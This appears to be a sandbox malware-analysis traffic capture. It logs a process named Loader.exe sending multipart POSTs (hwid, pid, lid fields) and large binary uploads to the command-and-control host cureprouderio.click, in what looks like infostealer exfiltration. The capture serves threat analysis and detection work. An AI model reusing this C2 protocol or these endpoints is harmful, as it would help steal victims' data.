vN0BfegO5exmrmLYDXxXdGMJkMqox3FcSlu5hJ3TJk3k3UQz6hepviGFU84RehRQcxSIxrbacl5HRb2U051nUeOMSiv7H/7hfu5pmQB8FiskCY3Pt8d9VkFbs4GW2StM5ZUDeegK7+xirn/YC3RffW1CzIG91DkHBGWgg4veNwLWnhti+AL54COPc9UEdVFjJB3M2PrLdR8cE7CAn9AgTuuQBXTmAOPoc6910Qt4W2FuCJDIs8F3V1ZQ8MrT1D8
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 58 32 76 50 76 2f 72 63 61 4e 31 33 6a 6c 4f 57 48 52 77 42 59 7a 48 75 6f 77 33 48 30 73 54 36 4c 33 54 6d 32 64 2f 71 74 30 53 4d 37 56 50 33 4f 56 76 72 6e 66 50 46 6a 31 31 5a 48 49 49 6d 59 4f 63 79 32 68 57 55 6c 36 69 78 4e 32 54 49 51 43 38 7a 55 51 7a 36 52 36 70 76 6a 48 79 4b 34 78 55 4a 77 59 68 65 30 79 62 67 61 79 4d 49 51 30 4b 45 36 4c 45 79 35 4e 67 51 2f 61 50 44 48 44 37 44 4b 37 59 58 34 42 37 7a 77 5a 39 58 58 39 61 50 4a 66 43 74 4d 4a 2b 53 56 55 54 2f 73 53 63 6b 33 39 35 70 4e 56 4b 54 4b 4e 50 38 61 59 35 34 45 58 61 43 58 35 52 5a 58 56 50 6f 73 71 73 7a 58 52 55 53 42 47 78 69 59 50 55 5a 77 36 6b 6d 30 6f 72 76 55 47 70 34 6e 44 67 4b 49 6c 56 4b 77 4d 67 4d 31 4c 51 33 76 54 56 4f 55 6b 45 43 2b 4c 4b 30 38 46 6e 47 4b 54 61 Data Ascii: X2vPv/rcaN13jlOWHRwBYzHuow3H0sT6L3Tm2d/qt0SM7VP3OVvrnfPFj11ZHIImYOcy2hWUl6ixN2TIQC8zUQz6R6pvjHyK4xUJwYhe0ybgayMIQ0KE6LEy5NgQ/aPDHD7DK7YX4B7zwZ9XX9aPJfCtMJ+SVUT/sSck395pNVKTKNP8aY54EXaCX5RZXVPosqszXRUSBGxiYPUZw6km0orvUGp4nDgKIlVKwMgM1LQ3vTVOUkEC+LK08FnGKTa
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 72 71 39 32 4b 67 65 35 6c 4a 4d 46 41 7a 50 46 44 4d 67 62 37 64 4f 51 63 55 41 65 76 52 77 49 52 33 45 76 76 54 45 7a 50 37 54 37 47 30 4c 2b 42 69 6d 56 38 77 45 58 42 32 45 49 54 43 72 4d 38 2b 59 58 70 31 73 34 4f 56 30 43 6c 58 39 64 38 6c 63 4f 59 44 35 65 46 33 6e 6b 37 4d 42 48 35 59 64 48 49 54 77 6f 2f 36 77 7a 6b 48 66 52 4f 68 6a 70 53 66 62 77 7a 31 6a 67 52 34 2b 77 69 70 32 53 2f 67 61 4a 6c 66 4d 47 4e 77 61 67 79 46 31 36 75 42 58 31 78 44 56 62 4f 4b 68 4d 4a 6e 44 71 53 62 53 69 75 2f 51 61 6e 69 63 4f 41 6f 69 56 55 72 41 79 41 7a 55 74 44 65 39 4e 55 35 53 51 51 4c 34 38 72 54 77 57 63 59 70 4e 6f 45 66 75 77 4d 35 2b 56 7a 73 6e 62 61 45 58 4d 52 54 56 6f 6e 6a 38 79 2f 77 6e 35 68 65 6e 4b 36 6c 4a 37 63 49 48 37 61 71 68 74 30 2f Data Ascii: rq92Kge5lJMFAzPFDMgb7dOQcUAevRwIR3EvvTEzP7T7G0L+BimV8wEXB2EITCrM8+YXp1s4OV0ClX9d8lcOYD5eF3nk7MBH5YdHITwo/6wzkHfROhjpSfbwz1jgR4+wip2S/gaJlfMGNwagyF16uBX1xDVbOKhMJnDqSbSiu/QanicOAoiVUrAyAzUtDe9NU5SQQL48rTwWcYpNoEfuwM5+VzsnbaEXMRTVonj8y/wn5henK6lJ7cIH7aqht0/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:03 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5JQYYRU4ZWU28LYM79 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12842 Host: cureprouderio.click
2024-12-28 03:14:03 UTC	12842	OUT	Data Raw: 2d 2d 35 4a 51 59 59 52 55 34 5a 57 55 32 38 4c 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 35 4a 51 59 59 52 55 34 5a 57 55 32 38 4c 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4a 51 59 59 52 55 34 5a 57 55 32 38 4c 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 Data Ascii: --5JQYYRU4ZWU28LYM79Content-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--5JQYYRU4ZWU28LYM79Content-Disposition: form-data; name="pid"2--5JQYYRU4ZWU28LYM79Content-Disposition: form-data; name="lid"LPnhqo--hubcp
2024-12-28 03:14:04 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sll5dtqi9uofopg09svooeueni; expires=Tue, 22 Apr 2025 21:00:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BuofGQWI3P7B5%2FDCYmFSV%2Bk695yWUEH10CsThI62I2BF5q9QWjVgCxW88n4IvL6hFplx5Rd4HVh1A2YvWiWW3pyruo3fN2UpCQJ3Hu9Zpopc%2BW7Hd1OFuD2gVdwcwQAH5GoaZ6h3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e60c6a8f18cbd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2029&rtt_var=787&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2849&recv_bytes=13785&delivery_rate=1368322&cwnd=180&unsent_bytes=0&cid=d226efba1cb288ce&ts=884&x=0"
2024-12-28 03:14:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 03:14:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:06 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=M7OTKUL40DGV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15048 Host: cureprouderio.click
2024-12-28 03:14:06 UTC	15048	OUT	Data Raw: 2d 2d 4d 37 4f 54 4b 55 4c 34 30 44 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 4d 37 4f 54 4b 55 4c 34 30 44 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 37 4f 54 4b 55 4c 34 30 44 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 0d 0a 2d 2d 4d 37 4f 54 4b 55 4c Data Ascii: --M7OTKUL40DGVContent-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--M7OTKUL40DGVContent-Disposition: form-data; name="pid"2--M7OTKUL40DGVContent-Disposition: form-data; name="lid"LPnhqo--hubcpvkeaidz--M7OTKUL
2024-12-28 03:14:06 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vonnh5teaufu25aup5mq3akjtu; expires=Tue, 22 Apr 2025 21:00:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXv6IIg2jiK%2BMg9xaH5k2MRy5TVmmOAB%2BxHifxS%2BYXLJMmcDC5Wp%2F8JPh1rM3yL1LWqEwuW9GcZFJWMcKOI0LMaOVDUf%2FyRL3DdscdffzvP1bqx6AskpFOS4OBtpall5HTdpKdrg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e60d5084d7c96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1788&rtt_var=702&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2851&recv_bytes=15985&delivery_rate=1524804&cwnd=173&unsent_bytes=0&cid=7e53bdb59927dfd0&ts=865&x=0"
2024-12-28 03:14:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 03:14:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:08 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=M8ZODEKLZRZCRA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20550 Host: cureprouderio.click
2024-12-28 03:14:08 UTC	15331	OUT	Data Raw: 2d 2d 4d 38 5a 4f 44 45 4b 4c 5a 52 5a 43 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 4d 38 5a 4f 44 45 4b 4c 5a 52 5a 43 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 38 5a 4f 44 45 4b 4c 5a 52 5a 43 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 0d 0a 2d 2d 4d Data Ascii: --M8ZODEKLZRZCRAContent-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--M8ZODEKLZRZCRAContent-Disposition: form-data; name="pid"3--M8ZODEKLZRZCRAContent-Disposition: form-data; name="lid"LPnhqo--hubcpvkeaidz--M
2024-12-28 03:14:08 UTC	5219	OUT	Data Raw: d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 Data Ascii: Zh'F3Wun 4F([:7s~X`nO`i
2024-12-28 03:14:09 UTC	1130	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qjqb9sumdtnt7s08j7o6oktivr; expires=Tue, 22 Apr 2025 21:00:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=26SBYWQs67FYEMMquljuv%2FDMi3WHvC6VUYq6mQRtbMuEfxJAdwl3IJC4dPDdC5i3nhEbH16VrrmFxdQJXdKidB5wiHim%2FSg4Ec%2BdDJ2SKo8mXtIaKH39irdjljwDTUNRlQIrDjZC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e60e3d9ec0cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1705&rtt_var=676&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21511&delivery_rate=1574973&cwnd=215&unsent_bytes=0&cid=3197a99fe92a6565&ts=1019&x=0"
2024-12-28 03:14:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 03:14:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49713	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:11 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=803Z290KWT6RJEV57 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1236 Host: cureprouderio.click
2024-12-28 03:14:11 UTC	1236	OUT	Data Raw: 2d 2d 38 30 33 5a 32 39 30 4b 57 54 36 52 4a 45 56 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 38 30 33 5a 32 39 30 4b 57 54 36 52 4a 45 56 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 30 33 5a 32 39 30 4b 57 54 36 52 4a 45 56 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 Data Ascii: --803Z290KWT6RJEV57Content-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--803Z290KWT6RJEV57Content-Disposition: form-data; name="pid"1--803Z290KWT6RJEV57Content-Disposition: form-data; name="lid"LPnhqo--hubcpvke
2024-12-28 03:14:11 UTC	1124	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8jkakvdoc7i3ob4hbbef4n8uas; expires=Tue, 22 Apr 2025 21:00:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdZHe2XS2jmAQpYvJqNM0ddMd49y5ARgeYM2m3WgA25Cwc47pXrFuLhk7X4%2FRkFvvzpt5I5jWYViJmQFwutCLhMvn%2B0GYq1yNd41v628XjSncCFcluqPnim94w128jNBxboLL6uA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e60f52f5643cf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1632&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2155&delivery_rate=1763285&cwnd=179&unsent_bytes=0&cid=1a8b596099cef1d2&ts=778&x=0"
2024-12-28 03:14:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 03:14:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49714	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:13 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WZ2GIHF5D30ZJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585642 Host: cureprouderio.click
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: 2d 2d 57 5a 32 47 49 48 46 35 44 33 30 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 57 5a 32 47 49 48 46 35 44 33 30 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 5a 32 47 49 48 46 35 44 33 30 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 0d 0a 2d 2d 57 5a 32 47 Data Ascii: --WZ2GIHF5D30ZJContent-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--WZ2GIHF5D30ZJContent-Disposition: form-data; name="pid"1--WZ2GIHF5D30ZJContent-Disposition: form-data; name="lid"LPnhqo--hubcpvkeaidz--WZ2G
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: c5 33 73 16 de 19 75 5b 3a d3 84 66 c0 18 0b 13 b3 9c 4c 21 5c 28 73 54 55 f5 e2 4f 9d 1a 0a c7 fc 25 b4 e3 db 49 24 21 16 ea 9d f9 cd 0b 75 23 71 42 1e dd 8d d7 1e 8c 44 0a d0 ba 2d b8 5c 1d 10 ab 2f 34 7c 9c 9f a5 df 7f 23 c2 cb e3 5d 77 3e 14 05 a8 cd bc 37 e3 e7 b5 da a0 ad 44 24 b2 e5 0d 6d be 10 26 02 ed 7d 68 a3 c3 ff 46 ee 04 6c 1a 01 ec 12 d8 0a 93 40 cf a3 98 e5 32 c0 f6 00 06 16 d8 c2 72 1d b1 11 99 12 6b fb b6 bc c5 41 06 7d b8 1f 02 e4 3e 7a 6e 33 b6 d7 4a d0 e6 7f d7 71 f6 8b 80 b8 4d 11 a6 2d 40 22 b0 1f a1 32 20 e9 1a 70 42 b5 a9 cf ea da 13 39 78 7e a8 83 81 2a d3 7d 2a ce ee 4f 62 31 27 25 f7 86 fc 5e e0 84 41 2b 40 94 99 a5 52 ef 44 c0 4a 55 31 bd eb a0 f2 bd f9 b2 4c 21 1a e7 4f ea 6c 66 f8 8a 38 0d 45 e8 78 51 eb 5e 13 2a d1 7a 02 69 Data Ascii: 3su[:fL!\(sTUO%I$!u#qBD-\/4\|#]w>7D$m&}hFl@2rkA}>zn3JqM-@"2 pB9x~}Ob1'%^A+@RDJU1L!Olf8ExQ^*zi
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: e2 d1 b7 2a ec 77 4a ef 10 23 d2 78 23 97 ae 99 c6 06 e8 57 e4 d3 3a 2b 56 a4 df 85 fb 66 c7 c5 c6 6e 1c 74 26 fd 8d be 75 05 c2 3f d3 61 d1 e6 38 3a a8 13 5c 19 a6 db fe 76 f4 9f fb f0 d9 d4 71 e2 89 8f e6 92 2b a3 8a 34 c2 eb 42 f2 8c 90 8f 10 b8 af ae 0b 79 76 76 4c d7 0f 6f dd 1a 98 bb bf 6b fe ef 01 c6 dc b5 7a de cd a0 01 df 37 55 ee fc e9 9e 6b 2d 68 42 a8 6c e5 53 5f 80 9f 0c 5a ff f6 75 28 64 c2 9d 65 6b 3c b5 d3 b1 7a 45 8a 20 d5 1d ac bd 7a 0d 35 59 78 1c 62 95 d7 27 a8 c4 41 a0 39 63 79 a2 9d c8 71 17 da 76 33 de e3 12 f4 ab 57 ac e1 80 1b db 01 30 3b fc b3 8a be 16 17 e1 41 86 a1 10 c4 a2 5c cd 83 48 df b0 70 3a 0e 36 9b a8 1d 46 68 31 1e 28 48 45 06 40 ff 77 7f 9f ce 7f e1 c3 48 d9 83 3c a2 76 da f1 ad 07 a0 d8 8e 49 15 01 fb 67 3f fe 6e 7a Data Ascii: *wJ#x#W:+Vfnt&u?a8:\vq+4ByvvLokz7Uk-hBlS_Zu(dek<zE z5Yxb'A9cyqv3W0;A\Hp:6Fh1(HE@wH<vIg?nz
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: f0 5a f1 94 37 e7 85 1f dc 9b ee a9 60 1d 76 ec 9e 33 c3 b8 cb 46 54 e4 12 53 f0 c9 ea 56 90 7f 7d ba 39 0a 34 5c a5 b9 d8 7b 46 03 e4 15 f3 95 38 fe 1d 94 86 05 05 20 c4 8c be ed cb f6 50 68 7e 24 bd f0 52 2c ed 30 b0 e9 cb 34 6e e0 4a bb 9e e0 fe 56 fb e4 8a 30 18 7c ee aa 05 5b 60 ef 3a 30 77 b0 8c 3c 93 8d 87 cf 7f 4b 8f 38 05 d4 b5 f6 92 67 88 61 e5 56 d7 6a 58 06 d3 fa 46 b1 b1 fa 7d 03 d1 06 8a 65 0a cd 39 6d 96 3c 38 65 8a 75 45 ae 8f 11 8f a0 03 27 91 d6 e6 9d f0 ba 2e 8d a4 dc f1 25 aa e9 0c 84 a2 3b ca 43 80 38 af 75 af 5c 82 60 ce 9c 00 5b 77 d7 49 f3 95 7b 43 4e b4 b3 2b f7 6e 3e ed 5f 4c 86 92 86 dc a7 20 78 df 45 d9 3b a1 4b bc 24 c0 a7 c0 af 1a eb 12 6c 9b 20 9e 9b a2 08 aa fe 3a a4 41 2a 30 15 1c 10 2d 59 f7 5f b1 09 9b c9 6f 48 25 32 11 Data Ascii: Z7`v3FTSV}94\{F8 Ph~$R,04nJV0\|[`:0w<K8gaVjXF}e9m<8euE'.%;C8u\`[wI{CN+n>_L xE;K$l :A*0-Y_oH%2
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: e5 e1 68 36 11 4c d0 62 1e 59 85 cd 36 19 ca cb 0f 11 af 88 34 ee 13 48 dc 13 9a 5d 73 96 25 c8 6b 7b 64 44 c6 10 7c 54 b3 6f fe f9 b3 13 51 fe d6 04 e2 a8 77 91 9a 9d b8 76 eb 98 5d 46 8c 94 06 ff 0f 98 19 84 a8 70 e3 20 46 a1 8e 1b e2 7d 2d 0d a7 2e 22 7a d7 8f 22 f1 f6 77 83 99 af a9 6d 16 e2 0e f7 a8 b2 8c 0d ed bd af 55 46 6c b9 4e 5a 92 31 e2 5e ef 9c f8 4b 2e 0f 48 76 6c 9c 94 da fb 52 4b 23 cc 59 83 d9 f9 ee 10 c2 15 8e 37 54 ed 22 55 63 e4 0a 2f a0 90 20 fd b6 28 6d 31 50 dc 69 9f d6 7d 8e 17 83 64 e3 38 41 8e 46 c1 fe a1 23 ca de 8d 10 5a cb 36 3e 43 40 fb 7f 16 eb ff ff 65 82 07 6c 4c 43 92 38 41 fa bc 20 3e 10 dc 82 6b b3 73 ce 85 91 74 b6 4c 8c 21 48 71 72 d0 a5 2b 69 03 6c fb 15 da 84 02 f0 59 85 45 9e 4f 6c 3f 87 c7 f7 42 24 d2 15 93 53 5f Data Ascii: h6LbY64H]s%k{dD\|ToQwv]Fp F}-."z"wmUFlNZ1^K.HvlRK#Y7T"Uc/ (m1Pi}d8AF#Z6>C@elLC8A >kstL!Hqr+ilYEOl?B$S_
2024-12-28 03:14:13 UTC	15331	OUT	Data Raw: a1 f4 47 09 db c6 6f 77 89 3e 20 f1 a3 b3 07 57 22 83 70 ef 34 0b 4f 90 02 4e a1 78 ca 8f 3e 4c 6d 2a 7c be af 47 0d 38 25 03 7a 20 c3 f5 3f 16 69 43 f6 fa b7 8a 05 b3 05 af a1 3d 7d b2 55 2b 2d e3 93 73 76 0b 55 9f 8e 6f b7 7f d7 12 de 39 d5 13 28 00 31 db f7 e8 db 03 8a de 8d 1a 81 d5 e7 2f 41 61 96 cd c8 82 a5 00 be c7 07 e4 24 17 a4 bc af 19 44 d1 3f e2 7d 5d c4 9e cc 98 38 1b d3 9f 45 c2 67 85 6a 44 81 f6 90 08 25 71 4b fc 3b ea a7 c7 d0 f5 19 9f 6c 0b fa 47 d1 e4 36 07 b3 7d fb 88 ef de a0 92 f9 4f 9c 88 24 61 91 4a dc e3 d1 af 01 11 15 33 02 d6 7b cb 7c 0e 36 e4 2a 27 80 31 99 4a 0f 5e 7c 02 59 f4 00 63 1b 31 a3 cc 22 de cf b2 48 15 b8 46 85 2c 5a 65 9c 18 be 6f 54 38 91 bb bf 9d 31 3b 4b 8a a5 c6 83 03 27 15 af 